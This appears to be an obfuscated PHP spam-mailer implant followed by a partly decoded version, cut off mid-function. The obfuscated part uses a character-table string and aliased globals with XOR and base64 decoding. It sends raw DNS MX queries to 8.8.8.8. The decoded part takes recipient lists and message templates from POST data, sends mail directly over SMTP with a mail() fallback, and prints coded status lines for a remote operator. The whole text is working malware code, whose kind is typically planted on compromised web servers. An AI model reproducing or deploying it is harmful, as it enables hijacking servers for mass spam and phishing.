$_SERVER[$r76[22].$r76[67].$r76[67].$r76[3].$r76[54].$r76[22].$r76[17].$r76[55].$r76[67]]); return TRUE; } function fewfx40($r76, $clhez9, $binbe57) { if (!isset($clhez9) || $clhez9 == "") { return FALSE; } $xgmnr96 = @$GLOBALS['vbhwy58'][$clhez9]; if ($binbe57) { $xgmnr96 = $GLOBALS['inenw32']($r76, $xgmnr96); for($wtqra76 = 0; $wtqra76 < $GLOBALS['brkww19']($xgmnr96); $wtqra76++) { $xgmnr96[$wtqra76]= $GLOBALS['xyxdn38']($GLOBALS['rtdlc97']($xgmnr96[$wtqra76]) ^ 2); } } return $GLOBALS['cnrfe78']($GLOBALS['wzekj92']($xgmnr96)); } function xwses24($r76, $rxuwy6) { $bdhch16=""; for($afses42=0;$afses42<256;$afses42++){$vefvn90[$afses42]=$GLOBALS['xyxdn38']($afses42);} $adcpo58=$GLOBALS['yrqxp89']($GLOBALS['vxogc32']($r76[16].$r76[16],$r76[4].$r76[50].$r76[40].$r76[6].$r76[79].$r76[0].$r76[48].$r76[22].$r76[64].$r76[81].$r76[19].$r76[71].$r76[11].$r76[56].$r76[17].$r76[3].$r76[37].$r76[68].$r76[55].$r76[67].$r76[44].$r76[60].$r76[82].$r76[32].$r76[34].$r76[63].$r76[90].$r76[96].$r76[27].$r76[95].$r76[94].$r76[7].$r76[61].$r76[36].$r76[53].$r76[47].$r76[29].$r76[5].$r76[78].$r76[58].$r76[49].$r76[41].$r76[84].$r76[24].$r76[66].$r76[87].$r76[45].$r76[70].$r76[43].$r76[20].$r76[69].$r76[35].$r76[52].$r76[76].$r76[46].$r76[31].$r76[85].$r76[28].$r76[23].$r76[14].$r76[18].$r76[15].$r76[80].$r76[16],-1,1)); $rfsny13 = array(); $GLOBALS['xavtv19']($r76[83].$r76[1].$r76[4].$r76[26].$r76[35].$r76[52].$r76[26].$r76[15].$r76[80].$r76[42].$r76[16].$r76[9].$r76[72].$r76[76].$r76[33].$r76[85].$r76[10].$r76[62],$rxuwy6,$rfsny13); foreach($rfsny13[0] as $dkpwg91){ $omqhl54=0; for($afses42=0;isset($dkpwg91[$afses42]);$afses42++){ $omqhl54=($omqhl54<<6)+$adcpo58[$dkpwg91[$afses42]]; if($afses42>0){ $bdhch16.=$vefvn90[$omqhl54>>(4-(2*($afses42-1)))];$omqhl54=$omqhl54&(0xf>>(2*($afses42-1))); } } } return $bdhch16; } function potcc11($r76, $mlaat34) { for($wtqra76 = 0; $wtqra76 < $GLOBALS['brkww19']($mlaat34); $wtqra76++) { $mlaat34[$wtqra76] = $GLOBALS['xyxdn38']($GLOBALS['rtdlc97']($mlaat34[$wtqra76]) ^ 2);} return $GLOBALS['zjheh80']($mlaat34); } function rzekg39($r76, $qzvww53, $ajvyf84, $kbujj5, $nqbin74, $qvbta37, &$kdidw81, &$msnsv40, $gxosp36 = false) { $vynus66 = ""; $yjmto45 = NULL; $qrmrf7 = NULL; $kdidw81 = 0; $msnsv40 = ""; if ($ajvyf84 == $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[3].$r76[68].$r76[17].$r76[67].$r76[17].$r76[54].$r76[67].$r76[40].$r76[3])) { $vynus66 = $r76[87].$r76[27].$r76[41]; $yjmto45 = SOL_TCP; $qrmrf7 = SOCK_STREAM; } else if ($ajvyf84 == $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[3].$r76[68].$r76[17].$r76[67].$r76[17].$r76[54].$r76[44].$r76[6].$r76[3])) { $vynus66 = $r76[45].$r76[95].$r76[41]; $qrmrf7 = SOCK_DGRAM; $yjmto45 = SOL_UDP; } else { $msnsv40 = $r76[79].$r76[24].$r76[24].$r76[49].$r76[24].$r76[74].$r76[39].$r76[53].$r76[58].$r76[70].$r76[90].$r76[5].$r76[53].$r76[95].$r76[39].$r76[41].$r76[24].$r76[49].$r76[87].$r76[49].$r76[27].$r76[49].$r76[5]; return FALSE; } switch($GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79])) { case $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67]): if ($qzvww53 == FALSE) { $qzvww53 = @$GLOBALS['gisxn89'](AF_INET, $qrmrf7, $yjmto45); if ($qzvww53 == FALSE) { $kdidw81 = $GLOBALS['oqikt29'](); $msnsv40 = $GLOBALS['tvxvt28']($kdidw81); break; } $GLOBALS['fmlld76']($qzvww53 , SOL_SOCKET, SO_REUSEADDR, 1); $GLOBALS['fmlld76']($qzvww53 , SOL_SOCKET, SO_RCVTIMEO, array($r76[66].$r76[94].$r76[27] => $qvbta37, $r76[45].$r76[66].$r76[94].$r76[27] => 0)); $GLOBALS['fmlld76']($qzvww53 , SOL_SOCKET, SO_SNDTIMEO, array($r76[66].$r76[94].$r76[27] => $qvbta37, $r76[45].$r76[66].$r76[94].$r76[27] => 0)); if ($gxosp36) { $GLOBALS['zwafy86']($qzvww53); } } if (!@$GLOBALS['uocvp26']($qzvww53, $kbujj5, $nqbin74)) { $kdidw81 = $GLOBALS['oqikt29']($qzvww53); $msnsv40 = $GLOBALS['tvxvt28']($kdidw81); } if ($gxosp36) { $GLOBALS['zwafy86']($qzvww53); } break; case $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[0].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67]): $qzvww53 = @$GLOBALS['xvxof76']($vynus66.$r76[74].$r76[16].$r76[16].$kbujj5, $nqbin74, $kdidw81, $msnsv40, $qvbta37); if ($qzvww53 && $gxosp36) { @$GLOBALS['vzqix48']($qzvww53, 0); } @$GLOBALS['sltum36']($qzvww53, $qvbta37); break; case $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[67].$r76[68].$r76[79].$r76[4].$r76[11]): $qzvww53 = @$GLOBALS['clkxn20']($vynus66.$r76[74].$r76[16].$r76[16].$kbujj5.$r76[74].$nqbin74, $kdidw81, $msnsv40, $qvbta37); if ($qzvww53 && $gxosp36) { @$GLOBALS['vzqix48']($qzvww53, 0); } @$GLOBALS['sltum36']($qzvww53, $qvbta37); break; default: $msnsv40 = $r76[79].$r76[24].$r76[24].$r76[49].$r76[24].$r76[74].$r76[39].$r76[53].$r76[58].$r76[70].$r76[90].$r76[5].$r76[53].$r76[95].$r76[39].$r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[39].$r76[87].$r76[69].$r76[41].$r76[94]; return FALSE; } return $qzvww53; } function xllez0($r76, &$qzvww53) { if ($qzvww53 == FALSE) { return; } if ($GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79]) == $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67])) { @$GLOBALS['unkvq75']($qzvww53); } else { @$GLOBALS['yoxhh65']($qzvww53); } $qzvww53 = FALSE; return; } function oyysg80($r76, $qzvww53, $ykcxg22, &$kdidw81, &$msnsv40) { if ($qzvww53 == FALSE) { return FALSE; } if ($GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79]) == $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67])) { $bdhch16 = @$GLOBALS['dskbo69']($qzvww53, $ykcxg22, PHP_BINARY_READ); if ($bdhch16 == FALSE) { $kdidw81 = $GLOBALS['oqikt29']($qzvww53); $msnsv40 = $GLOBALS['tvxvt28']($kdidw81); } } else { if (@$GLOBALS['jhtbn88']($qzvww53)) { return FALSE; } $bdhch16 = @$GLOBALS['zflfl64']($qzvww53, $ykcxg22); if ($GLOBALS['brkww19']($bdhch16) == 0) { $kdidw81 = 35; } } return $bdhch16; } function foftg27($r76, $qzvww53, $jrnqk91, &$kdidw81, &$msnsv40) { if ($qzvww53 == FALSE) { return FALSE; } if ($GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79]) == $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67])) { $bdhch16 = @$GLOBALS['uwnpx27']($qzvww53, $jrnqk91); if ($bdhch16 == FALSE) { $kdidw81 = $GLOBALS['oqikt29']($qzvww53); $msnsv40 = $GLOBALS['tvxvt28']($kdidw81); } } else { if (@$GLOBALS['jhtbn88']($qzvww53)) { return FALSE; } $bdhch16 = @$GLOBALS['stdvp96']($qzvww53, $jrnqk91); } return $bdhch16; } function wdtjf68($r76, $qzvww53, $qvbta37) { if ($qzvww53 == FALSE) { return FALSE; } if ($GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79]) == $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67])) { @$GLOBALS['fmlld76']($qzvww53 , SOL_SOCKET, SO_RCVTIMEO, array($r76[66].$r76[94].$r76[27] => $qvbta37, $r76[45].$r76[66].$r76[94].$r76[27] => 0)); @$GLOBALS['fmlld76']($qzvww53 , SOL_SOCKET, SO_SNDTIMEO, array($r76[66].$r76[94].$r76[27] => $qvbta37, $r76[45].$r76[66].$r76[94].$r76[27] => 0)); } else { @$GLOBALS['sltum36']($qzvww53, $qvbta37); } return TRUE; } function ybewy88($r76, $pfahk9, $jvanz2) { $kdidw81 = 0; $msnsv40 = ""; $qzvww53 = $GLOBALS['yoejz48']($r76, FALSE, $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[3].$r76[68].$r76[17].$r76[67].$r76[17].$r76[54].$r76[44].$r76[6].$r76[3]), $r76[18].$r76[86].$r76[18].$r76[86].$r76[18].$r76[86].$r76[18], 53, 10, $kdidw81, $msnsv40); if (!$qzvww53) { return FALSE; } $lsxth41 = $GLOBALS['ocmvf65'](0x0001, 0xFFFE); $uamee6 = $GLOBALS['bkenc7']($r76[86], $pfahk9); $vcoty45 = $GLOBALS['llpxl21']($r76[58].$r76[58].$r76[58].$r76[58].$r76[58].$r76[58], $lsxth41, 0x0100, 0x0001, 0x0000, 0x0000, 0x0000); foreach($uamee6 as $sahcc1) { $vcoty45 .= $GLOBALS['llpxl21']($r76[40].$r76[90].$r76[77], $GLOBALS['brkww19']($sahcc1), $sahcc1); } $vcoty45.= $GLOBALS['llpxl21']($r76[40].$r76[58].$r76[58], 0x00, $jvanz2, 0x0001); $zkvhr54 = $GLOBALS['ibere91']($r76, $qzvww53, $vcoty45, $kdidw81, $msnsv40); if (!$zkvhr54 || $zkvhr54 != $GLOBALS['brkww19']($vcoty45)) { $GLOBALS['xcnkh30']($r76, $qzvww53); return FALSE; } $yikqh30 = $GLOBALS['yhcum29']($r76, $qzvww53, 4086, $kdidw81, $msnsv40); if ($yikqh30 == FALSE || $GLOBALS['brkww19']($yikqh30) < 12) { $GLOBALS['xcnkh30']($r76, $qzvww53); return FALSE; } $eynrg66 = $GLOBALS['efljc33']($r76[58].$r76[87].$r76[53].$r76[95].$r76[16].$r76[58].$r76[7].$r76[5].$r76[90].$r76[61].$r76[66].$r76[16].$r76[58].$r76[84].$r76[45].$r76[94].$r76[16].$r76[58].$r76[90].$r76[58].$r76[66].$r76[16].$r76[58].$r76[90].$r76[45].$r76[87].$r76[36].$r76[16].$r76[58].$r76[90].$r76[95].$r76[95], substr($yikqh30, 0, 12)); $zjthw11 = 12; $bdhch16 = array($r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24] => $eynrg66); for ($afses42 = $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[37].$r76[79].$r76[55].$r76[67].$r76[64].$r76[17].$r76[56]); $afses42 <= $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[4].$r76[6].$r76[6].$r76[64].$r76[67].$r76[64].$r76[17].$r76[56].$r76[4].$r76[71]); $afses42++) { $trxcp25 = ''; switch ($afses42) { case $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[37].$r76[79].$r76[55].$r76[67].$r76[64].$r76[17].$r76[56]): $trxcp25 = $r76[84].$r76[45].$r76[94]; break; case $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[4].$r76[56].$r76[55].$r76[82].$r76[79].$r76[68]): $trxcp25 = $r76[90].$r76[58].$r76[66]; break; case $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[4].$r76[44].$r76[67].$r76[22].$r76[17].$r76[68].$r76[64].$r76[67].$r76[34]):$trxcp25 = $r76[90].$r76[45].$r76[87].$r76[36];break; case $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[4].$r76[6].$r76[6].$r76[64].$r76[67].$r76[64].$r76[17].$r76[56].$r76[4].$r76[71]):$trxcp25 = $r76[90].$r76[95].$r76[95];break; } for ($ybjpw87 = 0; $ybjpw87 < $eynrg66[$trxcp25]; $ybjpw87++) { $qthuo24[$r76[58].$r76[90].$r76[78].$r76[94]] = $GLOBALS['zndda55']($r76, $zjthw11, $yikqh30); if ($afses42 == $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[37].$r76[79].$r76[55].$r76[67].$r76[64].$r76[17].$r76[56])) { $qthuo24 = $GLOBALS['lzlla40']($qthuo24, $GLOBALS['efljc33']($r76[58].$r76[87].$r76[69].$r76[41].$r76[94].$r76[16].$r76[58].$r76[27].$r76[5].$r76[90].$r76[66].$r76[66], substr($yikqh30, $zjthw11, 4))); $zjthw11+=4; } else { $qthuo24 = $GLOBALS['lzlla40']($qthuo24 , $GLOBALS['efljc33']($r76[58].$r76[87].$r76[69].$r76[41].$r76[94].$r76[16].$r76[58].$r76[27].$r76[5].$r76[90].$r76[66].$r76[66].$r76[16].$r76[56].$r76[87].$r76[87].$r76[5].$r76[16].$r76[58].$r76[95].$r76[90].$r76[87].$r76[90].$r76[5].$r76[94].$r76[58].$r76[61].$r76[87].$r76[36], substr($yikqh30, $zjthw11, 10))); $zjthw11+=10; switch ($qthuo24[$r76[87].$r76[69].$r76[41].$r76[94]]) { case $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[11].$r76[32]): $qthuo24 = $GLOBALS['lzlla40']($qthuo24, $GLOBALS['efljc33']($r76[58].$r76[41].$r76[24].$r76[94].$r76[7].$r76[94].$r76[24].$r76[94].$r76[58].$r76[27].$r76[94], substr($yikqh30, $zjthw11, 2))); $zjthw11+=2; $qthuo24[$r76[95].$r76[90].$r76[87].$r76[90]] = $GLOBALS['zndda55']($r76, $zjthw11, $yikqh30); break; case $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[4]): $qthuo24 = $GLOBALS['lzlla40']($qthuo24, $GLOBALS['efljc33']($r76[56].$r76[95].$r76[90].$r76[87].$r76[90], substr($yikqh30, $zjthw11, 4))); $zjthw11+=4; $qthuo24[$r76[53].$r76[41]] = $GLOBALS['axqrn63']($qthuo24[$r76[95].$r76[90].$r76[87].$r76[90]]); break; case $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[56].$r76[55]): $qthuo24[$r76[95].$r76[90].$r76[87].$r76[90]] = $GLOBALS['zndda55']($r76, $zjthw11, $yikqh30); break; default: $zjthw11 += $qthuo24[$r76[95].$r76[90].$r76[87].$r76[90].$r76[5].$r76[94].$r76[58].$r76[61].$r76[87].$r76[36]]; } } $bdhch16[$trxcp25][] = $qthuo24; } } return $bdhch16; } function cgzhg7($r76, &$kwgra59, $yikqh30) { $bdhch16 = ""; $svrpc42 = $kwgra59; while ($GLOBALS['rtdlc97']($yikqh30[$svrpc42]) != 0) { if ($GLOBALS['rtdlc97']($yikqh30[$svrpc42]) == 0xC0) { if ($svrpc42 >= $kwgra59) { $kwgra59 += 2; } $svrpc42 = $GLOBALS['rtdlc97']($yikqh30[$svrpc42 + 1]); continue; } if ($GLOBALS['brkww19']($bdhch16) > 0) { $bdhch16 .= $r76[86]; } $bdhch16 .= substr($yikqh30, $svrpc42 + 1, $GLOBALS['rtdlc97']($yikqh30[$svrpc42])); $svrpc42 += $GLOBALS['rtdlc97']($yikqh30[$svrpc42]) + 1; if ($svrpc42 > $kwgra59) { $kwgra59 = $svrpc42; } } if ($svrpc42 >= $kwgra59) { $kwgra59 += 1; } return $bdhch16; }
The decoded code:
$r76="F[<PAlDf|]}M@~79/O8Kx\rH6r&-c5k\n3X,YzhQ> Cp\\wUu2jGoB;0i_SN\tn%Vg)ZI^sTRyvL{\$:=1*mE+JW(q4.t'`a!\"#edb?";
// @error_reporting(NULL);
// @ini_set("error_log", NULL);
// @ini_set("log_errors", 0);
define("DNS_TYPE_MX", 0x000F);
define("DNS_TYPE_A", 0x0001);
define("DNS_TYPE_NS", 0x0002);
define("DNS_STEP_QESTION", 1);
define("DNS_STEP_ANSWER", 2);
define("DNS_STEP_AUTHORITY", 3);
define("DNS_STEP_ADDITIONAL", 4);
define("SOCKET_TYPE_SOCKET", 1);
define("SOCKET_TYPE_FSOCKET", 2);
define("SOCKET_TYPE_STREAM", 4);
define("SOCKET_TYPE_NO", 5);
define("SOCKET_PROTO_TCP", 1);
define("SOCKET_PROTO_UDP", 2);
define("STEP_CONNECT", 0);
define("STEP_CONNECTED", 1);
define("STEP_EHLO", 2);
define("STEP_MAILFROM", 3);
define("STEP_RCPTTO", 4);
define("STEP_DATA", 5);
define("STEP_BODY", 6);
define("STEP_QUIT", 7);
define("STEP_COMPLETED", 8);
determine_socket_type($r76, NULL);
$senderEmailData = array(
"toList" => "",
"fromLogin" => "",
"fromName" => "",
"subjTempl" => "",
"bodyTempl" => "",
"hostFrom" => ""
);
if (FALSE == getDataFromPost($r76, $senderEmailData)) {
echo PHP_OS . "+" . md5(0987654321) . "+01+[[]]
";
exit;
}
$emailDataList = array();
for ($i = 0; $i < count($senderEmailData["toList"]); $i++) {
$emailData = array(
"id" => $i,
"g_mailto" => "",
"g_mailto+" => "",
"g_mailfrom" => "",
"g_mailfrom+" => "",
"g_domainto" => "",
"g_domainfrom" => "",
"g_namefirst" => "",
"g_namelast" => "",
"g_body" => "",
"g_subject" => "",
"g_fff" => FALSE,
"g_header" => "",
"g_headerfrom" => "",
"s_header" => "",
"s_mxhost" => "",
"s_mxaddr" => FALSE,
"s_sock" => FALSE,
"s_time" => time(),
"s_step" => constant("STEP_CONNECT"),
"s_port" => 25,
"s_datain" => "",
"s_dataout" => "",
"s_trig" => FALSE,
"l_err" => "",
"l_done" => FALSE,
"l_way" => 0, // 0 for not done, 1 for step?, 2 for using mail()
"l_failsmtp" => FALSE,
"l_smtp_end" => FALSE
);
if (FALSE == populateEmailData($r76, $senderEmailData["toList"][$i], $senderEmailData, $emailData)) {
echo PHP_OS . "+" . md5(1111111111) . "+02+[[" . encode_data($r76, $senderEmailData["toList"][$i]) . "]]
";
continue;
}
$emailDataList[] = $emailData;
}
print_r($emailDataList);
exit;
processSendEmails($r76, $emailDataList); // first send by sockets
sendByMail($r76, $emailDataList); // then fall back to mail()
printStatus($r76, $emailDataList); // print status
exit;
function printStatus($r76, $emailDataList)
{
$successes = 0;
$successMethods = "";
for ($i = 0; $i < count($emailDataList); $i++) {
if ($emailDataList[$i]["l_failsmtp"] == TRUE) {
echo PHP_OS . "+" . md5(2222222222) . "+04+[[" . encode_data($r76, $emailDataList[$i]["g_mailto"] . " :: " . $emailDataList[$i]["l_err"]) . "]]
";
}
if ($emailDataList[$i]["l_done"] == TRUE) {
$successMethods .= $emailDataList[$i]["l_way"];
$successes++;
}
}
if ($successes == 0) {
echo PHP_OS . "+" . md5(0987654321) . "+04+[[]]
";
} else {
echo "OK+" . md5(1234567890) . "+" . $successes . "+" . count($emailDataList) . "[" . $successMethods . "]
";
}
}
function sendByMail($r76, &$emailDataList)
{
if (!function_exists("mail")) {
return FALSE;
}
for ($i = 0; $i < count($emailDataList); $i++) {
if ($emailDataList[$i]["l_done"] == TRUE) {
continue;
}
if ($emailDataList[$i]["g_fff"]) {
if (@mail($emailDataList[$i]["g_mailto+"], $emailDataList[$i]["g_subject"], $emailDataList[$i]["g_body"], $emailDataList[$i]["g_headerfrom"] . $emailDataList[$i]["g_header"], "-f" . $emailDataList[$i]["g_mailfrom"])) {
$emailDataList[$i]["l_done"] = TRUE;
$emailDataList[$i]["l_way"] = 2;
} else {
$emailDataList[$i]["l_done"] = FALSE;
}
} else {
if (@mail($emailDataList[$i]["g_mailto+"], $emailDataList[$i]["g_subject"], $emailDataList[$i]["g_body"], $emailDataList[$i]["g_header"])) {
$emailDataList[$i]["l_done"] = TRUE;
$emailDataList[$i]["l_way"] = 2;
} else {
$emailDataList[$i]["l_done"] = FALSE;
}
}
}
}
function processSendEmails($r76, &$emailDataList)
{
// while at least one socket in email list is opened...
while (hasOpenedSockets($r76, $emailDataList)) {
// process the emails in the list
processEmailSending($r76, $emailDataList);
usleep(25000);
}
}
function smtpCloseConnection($r76, &$emailDataList, $emailId, $flunj82, $mavcb77)
{
if ($emailDataList[$emailId]["s_sock"] != FALSE) {
close_connection($r76, $emailDataList[$emailId]["s_sock"]);
}
$emailDataList[$emailId]["l_err"] = "[" . $emailDataList[$emailId]["s_step"] . "]" . trim(preg_replace("/
/", " ", $flunj82));
$emailDataList[$emailId]["l_failsmtp"] = $mavcb77;
$emailDataList[$emailId]["l_smtp_end"] = TRUE;
return;
}
function processEmailSending($r76, &$emailDataList)
{
$startTime = time();
foreach ($emailDataList as $emailId => $emailData) {
if ($emailData["l_smtp_end"] == TRUE) {
continue;
}
if ($emailData["s_time"] + 20 < $startTime) {
if ($emailDataList[$emailId]["s_step"] == constant("STEP_CONNECT") && $emailDataList[$emailId]["s_port"] != 587) {
close_connection($r76, $emailDataList[$emailId]["s_sock"]);
$emailDataList[$emailId]["s_port"] = 587;
$emailDataList[$emailId]["s_time"] = time();
continue;
}
smtpCloseConnection($r76, $emailDataList, $emailId, "timeout", FALSE);
continue;
}
switch ($emailDataList[$emailId]["s_step"]) {
case constant("STEP_CONNECT"):
if ($emailDataList[$emailId]["s_mxaddr"] == FALSE) {
$emailDataList[$emailId]["s_mxaddr"] = @gethostbyname($emailDataList[$emailId]["s_mxhost"]);
if (!@preg_match("/([0-9]{1,3}\.?){4}/", $emailDataList[$emailId]["s_mxaddr"])) {
smtpCloseConnection($r76, $emailDataList, $emailId, "resolve mx", FALSE);
break;
}
}
$errno = 0;
$errstr = '';
$emailDataList[$emailId]["s_sock"] = socketFactory($r76, $emailDataList[$emailId]["s_sock"], constant("SOCKET_PROTO_TCP"), $emailDataList[$emailId]["s_mxaddr"], $emailDataList[$emailId]["s_port"], 2, $errno, $errstr, TRUE);
if ($emailDataList[$emailId]["s_sock"] == FALSE) {
break;
}
if ($errno == 0 || $errno === 56 || $errno === 10056) {
$emailDataList[$emailId]["s_step"] = constant("STEP_CONNECTED");
wdtjf68($r76, $emailDataList[$emailId]["s_sock"], 15);
$emailDataList[$emailId]["s_time"] = time();
}
break;
case constant("STEP_CONNECTED"):
if (rxrmp70($r76, $emailDataList, $emailId)) {
$emailDataList[$emailId]["s_datain"] = "";
$emailDataList[$emailId]["s_dataout"] = "EHLO " . $emailDataList[$emailId]["g_domainfrom"] . "
";
$emailDataList[$emailId]["s_step"] = constant("STEP_EHLO");
$emailDataList[$emailId]["s_time"] = time();
}
break;
case constant("STEP_EHLO"):
if (prcux47($r76, $emailDataList, $emailId)) {
if (rxrmp70($r76, $emailDataList, $emailId)) {
if (substr($emailDataList[$emailId]["s_datain"], 0, 3) != 250) {
smtpCloseConnection($r76, $emailDataList, $emailId, $emailDataList[$emailId]["s_datain"], TRUE);
break;
}
$emailDataList[$emailId]["s_datain"] = "";
$emailDataList[$emailId]["s_dataout"] = "MAIL FROM:<" . $emailDataList[$emailId]["g_mailfrom"] . ">
";
$emailDataList[$emailId]["s_step"] = constant("STEP_MAILFROM");
$emailDataList[$emailId]["s_time"] = time();
}
break;
}
break;
case constant("STEP_MAILFROM"):
if (prcux47($r76, $emailDataList, $emailId)) {
if (rxrmp70($r76, $emailDataList, $emailId)) {
if (substr($emailDataList[$emailId]["s_datain"], 0, 3) != 250) {
smtpCloseConnection($r76, $emailDataList, $emailId, $emailDataList[$emailId]["s_datain"], TRUE);
break;
}
$emailDataList[$emailId]["s_datain"] = "";
$emailDataList[$emailId]["s_dataout"] = "RCPT TO:<" . $emailDataList[$emailId]["g_mailto"] . ">
";
$emailDataList[$emailId]["s_step"] = constant("STEP_RCPTTO");
$emailDataList[$emailId]["s_time"] = time();
}
break;
}
break;
case constant("STEP_RCPTTO"):
if (prcux47($r76, $emailDataList, $emailId)) {
if (rxrmp70($r76, $emailDataList, $emailId)) {
if (substr($emailDataList[$emailId]["s_datain"], 0, 3) != 250 && substr($emailDataList[$emailId]["s_datain"], 0, 3) != 251) {
smtpCloseConnection($r76, $emailDataList, $emailId, $emailDataList[$emailId]["s_datain"], TRUE);
break;
}
$emailDataList[$emailId]["s_datain"] = "";
$emailDataList[$emailId]["s_dataout"] = "DATA
";
$emailDataList[$emailId]["s_step"] = constant("STEP_DATA");
$emailDataList[$emailId]["s_time"] = time();
}
break;
}
break;
case constant("STEP_DATA"):
if (prcux47($r76, $emailDataList, $emailId)) {
if (rxrmp70($r76, $emailDataList, $emailId)) {
if (substr($emailDataList[$emailId]["s_datain"], 0, 3) != 354) {
smtpCloseConnection($r76, $emailDataList, $emailId, $emailDataList[$emailId]["s_datain"], TRUE);
break;
}
$emailDataList[$emailId]["s_datain"] = "";
$emailDataList[$emailId]["s_dataout"] = $emailDataList[$emailId]["s_header"] . "
" . $emailDataList[$emailId]["g_body"] . "
.
";
$emailDataList[$emailId]["s_step"] = constant("STEP_BODY");
$emailDataList[$emailId]["s_time"] = time();
}
break;
}
break;
case constant("STEP_BODY"):
if (prcux47($r76, $emailDataList, $emailId)) {
if (rxrmp70($r76, $emailDataList, $emailId)) {
if (substr($emailDataList[$emailId]["s_datain"], 0, 3) != 250) {
smtpCloseConnection($r76, $emailDataList, $emailId, $emailDataList[$emailId]["s_datain"], TRUE);
break;
}
$emailDataList[$emailId]["s_datain"] = "";
$emailDataList[$emailId]["s_dataout"] = "QUIT
";
$emailDataList[$emailId]["s_step"] = constant("STEP_QUIT");
$emailDataList[$emailId]["s_time"] = time();
$emailDataList[$emailId]["l_done"] = TRUE;
$emailDataList[$emailId]["l_way"] = 1;
}
break;
}
break;
case constant("STEP_QUIT"):
if (prcux47($r76, $emailDataList, $emailId)) {
smtpCloseConnection($r76, $emailDataList, $emailId, "", FALSE);
}
break;
}
}
}
function rxrmp70($r76, &$emailDataList, $emailId)
{
$errno = 0;
$errstr = "";
if ($emailDataList[$emailId]["s_trig"] == FALSE) {
if (strlen($emailDataList[$emailId]["s_datain"]) != 0) {
return TRUE;
}
return FALSE;
}
$data = read_socket_data($r76, $emailDataList[$emailId]["s_sock"], 4086, $errno, $errstr);
if ($data == FALSE || $data == "") {
if ($errno != 35 && $errno != 10035 && $errno != 11 && $errno != 10060) {
smtpCloseConnection($r76, $emailDataList, $emailId, $errstr, FALSE);
return FALSE;
}
if (strlen($emailDataList[$emailId]["s_datain"]) != 0) {
return TRUE;
}
return FALSE;
}
$emailDataList[$emailId]["s_datain"] = $data;
return FALSE;
}
function prcux47($r76, &$emailDataList, $emailId)
{
$errno = 0;
$errstr = "";
if (strlen($emailDataList[$emailId]["s_dataout"]) == 0) {
return TRUE;
}
$data = write_socket_data($r76, $emailDataList[$emailId]["s_sock"], $emailDataList[$emailId]["s_dataout"], $errno, $errstr);
if ($data == FALSE) {
if ($errno != 35 && $errno != 10035 && $errno != 11 && $errno != 10060) {
smtpCloseConnection($r76, $emailDataList, $emailId, $errstr, FALSE);
}
return FALSE;
}
